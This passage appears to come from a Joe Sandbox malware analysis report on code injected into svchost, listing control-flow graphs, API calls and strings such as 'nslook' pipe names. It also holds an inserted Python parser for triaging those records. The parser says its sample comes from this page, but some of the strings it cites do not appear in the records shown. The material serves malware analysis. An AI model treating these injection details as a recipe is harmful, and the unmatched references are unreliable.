                            control_flow_graph 733 1caf3d03c30-1caf3d03c54 734 1caf3d03c5a-1caf3d03c5f 733->734 735 1caf3d03db7-1caf3d03dba 733->735 736 1caf3d03efa-1caf3d03f16 734->736 737 1caf3d03c65-1caf3d03c69 734->737 735->736 738 1caf3d03dc0-1caf3d03dc5 735->738 739 1caf3d03c70-1caf3d03c88 737->739 738->736 740 1caf3d03dcb-1caf3d03dce 738->740 741 1caf3d03c8a-1caf3d03c9e call 1caf3d0a610 739->741 742 1caf3d03ca4-1caf3d03cab 739->742 743 1caf3d03dd0-1caf3d03ddf 740->743 741->742 758 1caf3d03d72-1caf3d03d9e call 1caf3d09480 741->758 747 1caf3d03cad-1caf3d03cc1 call 1caf3d0a610 742->747 748 1caf3d03cc7-1caf3d03cd4 742->748 745 1caf3d03dfb-1caf3d03e02 743->745 746 1caf3d03de1-1caf3d03df5 call 1caf3d0a610 743->746 752 1caf3d03e1e-1caf3d03e2b 745->752 753 1caf3d03e04-1caf3d03e18 call 1caf3d0a610 745->753 746->745 769 1caf3d03ec2-1caf3d03ee6 call 1caf3d09480 746->769 747->748 747->758 754 1caf3d03d20-1caf3d03d2e 748->754 755 1caf3d03cd6-1caf3d03cdd 748->755 763 1caf3d03e2d-1caf3d03e34 752->763 764 1caf3d03e70-1caf3d03e7e 752->764 753->752 753->769 756 1caf3d03d30-1caf3d03d37 754->756 757 1caf3d03da1-1caf3d03dac 754->757 755->754 762 1caf3d03cdf-1caf3d03ce3 755->762 756->757 766 1caf3d03d39-1caf3d03d3d 756->766 757->739 765 1caf3d03db2 757->765 758->757 762->754 771 1caf3d03ce5 762->771 763->764 773 1caf3d03e36-1caf3d03e3a 763->773 767 1caf3d03e80-1caf3d03e87 764->767 768 1caf3d03ee9-1caf3d03ef4 764->768 765->736 766->757 775 1caf3d03d3f 766->775 767->768 776 1caf3d03e89-1caf3d03e8d 767->776 768->736 768->743 769->768 777 1caf3d03cf0-1caf3d03cff 771->777 773->764 779 1caf3d03e3c 773->779 782 1caf3d03d40-1caf3d03d4f 775->782 776->768 783 1caf3d03e8f 776->783 784 1caf3d03d01-1caf3d03d07 lstrcmpiW 777->784 785 1caf3d03d09 lstrcmpW 777->785 780 1caf3d03e40-1caf3d03e4f 779->780 787 1caf3d03e51-1caf3d03e57 lstrcmpiW 780->787 788 1caf3d03e59 lstrcmpW 780->788 789 1caf3d03d51-1caf3d03d57 lstrcmpiW 782->789 790 1caf3d03d59 lstrcmpW 782->790 791 1caf3d03e90-1caf3d03e9f 783->791 786 1caf3d03d0f-1caf3d03d18 784->786 785->786 786->758 792 1caf3d03d1a-1caf3d03d1e 786->792 793 1caf3d03e5f-1caf3d03e68 787->793 788->793 794 1caf3d03d5f-1caf3d03d68 789->794 790->794 795 1caf3d03ea1-1caf3d03ea7 lstrcmpiW 791->795 796 1caf3d03ea9 lstrcmpW 791->796 792->754 792->777 793->769 797 1caf3d03e6a-1caf3d03e6e 793->797 794->758 798 1caf3d03d6a-1caf3d03d6e 794->798 799 1caf3d03eaf-1caf3d03eb8 795->799 796->799 797->764 797->780 798->782 800 1caf3d03d70 798->800 799->769 801 1caf3d03eba-1caf3d03ebe 799->801 801->791 802 1caf3d03ec0 801->802 802->768
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: fc363703b85945f396ceb6e40efe4c4ef5aa06f6e187a463130505bc425caf08
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: 3B81EFBE343A4886FB569F26D544BAD2360FF00FC8F854A2DDA1647A98DB34C411C322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: c1577d2e7ca3da6836641286d13c986415e323225c55ee343c3f861f4e851ab7
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: 80518EBA605B8487F755DB21F48079E73A4FB88F84F804829DB8943B58DF38C165CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 836 1caf3d044f0-1caf3d0450a 837 1caf3d0473a-1caf3d0474b call 1caf3d083e0 836->837 838 1caf3d04510-1caf3d0452a GetModuleHandleW 836->838 840 1caf3d0452c-1caf3d04556 call 1caf3d14118 VirtualProtectEx 838->840 841 1caf3d04596-1caf3d045a5 838->841 840->841 848 1caf3d04558-1caf3d04590 call 1caf3d14118 VirtualProtectEx 840->848 843 1caf3d045ba-1caf3d045c1 841->843 844 1caf3d045a7-1caf3d045af TerminateThread 841->844 843->837 847 1caf3d045c7-1caf3d045f0 call 1caf3d069c0 GetCurrentThread call 1caf3d06ee0 843->847 844->843 855 1caf3d045f2-1caf3d045fe call 1caf3d06620 847->855 856 1caf3d04603-1caf3d04612 847->856 848->841 855->856 857 1caf3d04614-1caf3d04620 call 1caf3d06620 856->857 858 1caf3d04625-1caf3d04634 856->858 857->858 861 1caf3d04636-1caf3d04642 call 1caf3d06620 858->861 862 1caf3d04647-1caf3d04656 858->862 861->862 864 1caf3d04658-1caf3d04664 call 1caf3d06620 862->864 865 1caf3d04669-1caf3d04678 862->865 864->865 867 1caf3d0467a-1caf3d04686 call 1caf3d06620 865->867 868 1caf3d0468b-1caf3d0469a 865->868 867->868 870 1caf3d0469c-1caf3d046a8 call 1caf3d06620 868->870 871 1caf3d046ad-1caf3d046bc 868->871 870->871 873 1caf3d046be-1caf3d046ca call 1caf3d06620 871->873 874 1caf3d046cf-1caf3d046de 871->874 873->874 876 1caf3d046e0-1caf3d046ec call 1caf3d06620 874->876 877 1caf3d046f1-1caf3d04700 874->877 876->877 879 1caf3d04702-1caf3d0470e call 1caf3d06620 877->879 880 1caf3d04713-1caf3d04722 877->880 879->880 882 1caf3d04724-1caf3d04730 call 1caf3d06620 880->882 883 1caf3d04735 call 1caf3d06a30 880->883 882->883 883->837
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: 70e6f561c1eb3f939752b9bed59ac73874087983ce0d1d40c9e64857cd72c40b
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 4A61F6B82A7B4981FB92DB15E450BDD23A0FF84F48FC4581DA94E067A9EF38C114C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 886 1caf3d0a140-1caf3d0a17d 887 1caf3d0a26d 886->887 888 1caf3d0a183-1caf3d0a186 886->888 889 1caf3d0a26f-1caf3d0a28b 887->889 888->889 890 1caf3d0a18c 888->890 891 1caf3d0a18f 890->891 892 1caf3d0a265 891->892 893 1caf3d0a195-1caf3d0a1a3 891->893 892->887 894 1caf3d0a1b0-1caf3d0a1cf LoadLibraryExW 893->894 895 1caf3d0a1a5-1caf3d0a1a8 893->895 898 1caf3d0a1d1-1caf3d0a1da call 1caf3d14070 894->898 899 1caf3d0a227-1caf3d0a23c 894->899 896 1caf3d0a1ae 895->896 897 1caf3d0a247-1caf3d0a256 GetProcAddress 895->897 900 1caf3d0a21b-1caf3d0a222 896->900 897->892 903 1caf3d0a258-1caf3d0a263 897->903 905 1caf3d0a1dc-1caf3d0a1f1 call 1caf3d0b838 898->905 906 1caf3d0a209-1caf3d0a213 898->906 899->897 902 1caf3d0a23e-1caf3d0a241 FreeLibrary 899->902 900->891 902->897 903->889 905->906 909 1caf3d0a1f3-1caf3d0a207 LoadLibraryExW 905->909 906->900 909->899 909->906
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 65e2976d0a42af2130eb147e7edb084dc780f9753c5b6a578f152fe1740407a9
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: 5C31C37A24774895FF1B9B12A800FDD22A4BF04F68F89493D9D2907759EE38C1548322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: 3e9a5a48930e75629c221ceb7b1ea5e4c166303367022871518e3ccb6883d382
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: A031A0B93836498AFB169B26D440BEC6B72BF48F8CFD44819CE0A47698DF34C515C322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: 833797296e46c5b7d956f8fd8a4e0a6db3e0c9cdfbb1b9d13d89579051f5369f
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 0131A37D24764886FB669F11D494BED6760FF44F88FC44819CE4A03698DF38C519C722
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: e67e887bb96bb0dca2baac1f8a2af4cb668f9101999b2a03d53516ca95fd5aad
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: 2811BB36251B448BF352AB42F844B9D62B0FB88FE8F804728EB1D837A4CB38C9148715
                            Uniqueness

                            Uniqueness Score: -1.00%
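The per-function records above (Source File, Snapshot File, API ID, String ID, Uniqueness Score) are what a triager would pull out of this section: the `$`-delimited String ID fields carry the named pipes (`\\.\pipe\nslookchildproc32`, `\\.\pipe\nslookchildproc64`), the device path `\Device\Nsi`, the native API name `NtQueryObject` and the comparison token `nslook` that recur next to `lstrcmpiW` in the graphs above. The following parser is an added example written for this page, not Joe Sandbox code and not code from the analysed sample. It reads records in the layout shown here, splits the `$`-delimited fields, buckets each string by what to check next, and cross-checks the two file names against each other (the `47`/`2`/`1caf3d00000` in the snapshot name against the `0000002F`/`00000002`/`000001CAF3D00000` fields of the `.sdmp` name). The meaning assigned to the `.sdmp` name fields (pid, dump index, base, page protection, in hex) and to the `hcaresult_<pid>_<dump>_<base>_<image>.jbxd` layout is an assumption that fits the values on the page, not something the report documents; `0x40` is the Win32 `PAGE_EXECUTE_READWRITE` value. The `SAMPLE` text is constructed from two records visible on the page. One edge case is handled on purpose: `CONOUT$` contains a literal `$`, so a naive split on the delimiter would yield an empty trailing piece.

```python
"""Parse Joe Sandbox per-function summary records and flag their strings.
Added example, not Joe Sandbox code. SAMPLE is constructed from records on
this page; the meaning given to the .sdmp name fields (pid.dump.?.base.
protect...) and to hcaresult_<pid>_<dump>_<base>_<image>.jbxd is assumed."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = r"""
• Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
• Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
• API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
• String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
Uniqueness Score: -1.00%
• Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
• Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
"""

PAGE_EXECUTE_READWRITE = 0x40  # Win32 page-protection constant
FIELD_RE = re.compile(r"^\u2022\s*([^:]+):\s*(.*)$")  # "• Key: value"
SOURCE_RE = re.compile(r"^([0-9A-Fa-f.]+)\.sdmp,\s*Offset:\s*([0-9A-Fa-f]+)")
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+)\.jbxd$")


@dataclass
class FunctionRecord:
    pid: int = 0            # assumed: first .sdmp field, hex
    dump_index: int = 0     # assumed: second .sdmp field, hex
    base: int = 0           # fourth .sdmp field; equals the Offset value
    protect: int = 0        # assumed: fifth .sdmp field, page protection
    snapshot: str = ""
    api_groups: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    uniqueness: Optional[float] = None


def split_dollar(value: str) -> List[str]:
    """Split a '$'-delimited field. CONOUT$ ends in a literal '$', which
    surfaces as an empty piece: glue it back onto the previous entry."""
    out: List[str] = []
    for part in value.split("$"):
        if part:
            out.append(part)
        elif out:
            out[-1] += "$"
    return out


def parse_source_file(value: str) -> FunctionRecord:
    m = SOURCE_RE.match(value)
    f = m.group(1).split(".") if m else []
    if len(f) != 8:
        raise ValueError("unexpected Source File layout: " + value)
    return FunctionRecord(pid=int(f[0], 16), dump_index=int(f[1], 16),
                          base=int(f[3], 16), protect=int(f[4], 16))


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = FIELD_RE.match(line)
        if m and m.group(1) == "Source File":
            records.append(parse_source_file(m.group(2)))
        elif not records:
            continue  # nothing before the first record is a field
        elif m and m.group(1) == "Snapshot File":
            records[-1].snapshot = m.group(2)
        elif m and m.group(1) == "API ID":
            records[-1].api_groups = split_dollar(m.group(2))
        elif m and m.group(1) == "String ID":
            records[-1].strings = split_dollar(m.group(2))
        elif line.startswith("Uniqueness Score:"):
            records[-1].uniqueness = float(line.split(":", 1)[1].strip("% "))
    return records


def snapshot_matches(rec: FunctionRecord) -> bool:
    """Cross-check pid, dump index and base between the two file names."""
    m = SNAPSHOT_RE.match(rec.snapshot)
    if not m:
        return False
    return (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == \
        (rec.pid, rec.dump_index, rec.base)


def classify_string(s: str) -> str:
    """Bucket one extracted string by what a triager would check next."""
    low = s.lower()
    if low.startswith("\\\\.\\pipe\\"):
        return "named_pipe"
    if low.startswith("\\device\\"):
        return "device_path"
    if low.endswith(".dll"):
        return "module"
    if re.fullmatch(r"(Nt|Zw)[A-Z]\w*", s):
        return "native_api"
    if low in ("conout$", "conin$"):
        return "console"
    return "other"


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(f"pid={rec.pid} base={rec.base:#x} "
              f"rwx={rec.protect == PAGE_EXECUTE_READWRITE} "
              f"names_agree={snapshot_matches(rec)}")
        for s in rec.strings:
            print(f"  {classify_string(s):12} {s}")
```

Fragments inside one API ID group are run together without a separator (`CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen`), so the parser keeps groups whole rather than guessing API names from them; the String ID field is the one worth splitting, because each piece there is an exact string the function references.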

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: 35b90a3237b9a9135fda92b2496fd36be12056c0d932e51acbb0f9358983c5d5
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: 9CC172BE74260887FB62CF1AD080BAD73A9FB44F88FD58819DB1943758DB35C8958721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction ID: 19fdd1cb08e27cc95f15cc9a1ca83366530aafe963dfa33d28d3e745cc58701e
                            • Opcode Fuzzy Hash: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction Fuzzy Hash: 46D1CC7A249B8C86EB719B15E49079E77A0F788F88F50461AEA8D477A9CF3CC540CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: 84f30b7b8443c3dbdddd981370fe916ebb5c5f4e012e2662316ca4ef8b58849e
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: CAF054B935264887FF4AAB11E440BDC2371AF44F49FC4181D9A1746165DE3CC598C331
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction ID: 610cd98aa1d0c3d958102382bb9d4eea5c2a4571738aa5296080f9f3380827c4
                            • Opcode Fuzzy Hash: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction Fuzzy Hash: 1602FA7625AB8486EB61CB55E49079EB7A0F7C4F88F500419EB8E83BA9DF7CC444CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: 4bd94f8dc5dba92db93e217a06d19c352bbab255eca38efcf870cc392fafb26d
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 3281D17A6926188EF712ABA1C840BED67A8FF44F8CFC44919DF0A53695DB34C442C332
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction ID: e8d2703c6cae52ccd9f9e9d9ca7c1f9fd9823a32d2aa56dd6933f8e07a4ce587
                            • Opcode Fuzzy Hash: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction Fuzzy Hash: 4F61DA7A55AA88C6F7619B15E440B5EB7A0F7C8F48F900619FA8D43BA8DB7CC540CF12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: 9c4ca6de60cc47f70c32a58e1ef88b2e0ad2f293e7d7aa97627fab645f245e6f
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: D71194366D5A4802F77A3124D477BEDD0506F54B7CFC8462CAB661B2D68A39CDCBE202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 050267ecfea151eb240bd884ce3ab19800f4d3be0a9e195f6699514267cc12ca
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 4B11A73AAD1A480BF7563168E456BED1041AF54B7CFD80E2CBF66167E68A37C8414337
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: b7a8c72d483ff2acc95db7e83d010dfccae0723c48626c64fea654c7c0738f3f
                            • Instruction ID: ba2f0b5cee4d51f0b964e742dd473071842cafbe87033cd548e4f59c13dc46d7
                            • Opcode Fuzzy Hash: b7a8c72d483ff2acc95db7e83d010dfccae0723c48626c64fea654c7c0738f3f
                            • Instruction Fuzzy Hash: 4D1175B968324D86FB1AE731E500B9D21956F44FA8F844F2C9A25073DEDA3CC8118622
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: f6634c41ae03bde2e2864d0cb549cdece98befc63be2613c7651d9fbf390faae
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: 2961A7319C364C82FB679B15A478BED6690AF54F4CF90401DFA2A17794DB34C86F8222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: 2c85641b1a64a1da1be9ab33fded31c846974fe09f318bf5ac710a5bc287d209
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: 0E4127766C2348C1FB369B018460BFD76A0AB04F9CFD54119FAA9077D5CA38C4ABC302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: 462985870bfdf1342da8fc51c496a26ba0f051886f3aef4276edea1721e35e3e
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 6D41F276716A4886FB21AF25E4407ED67A4FB88B88F804429EF4D83788EB7CC001C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
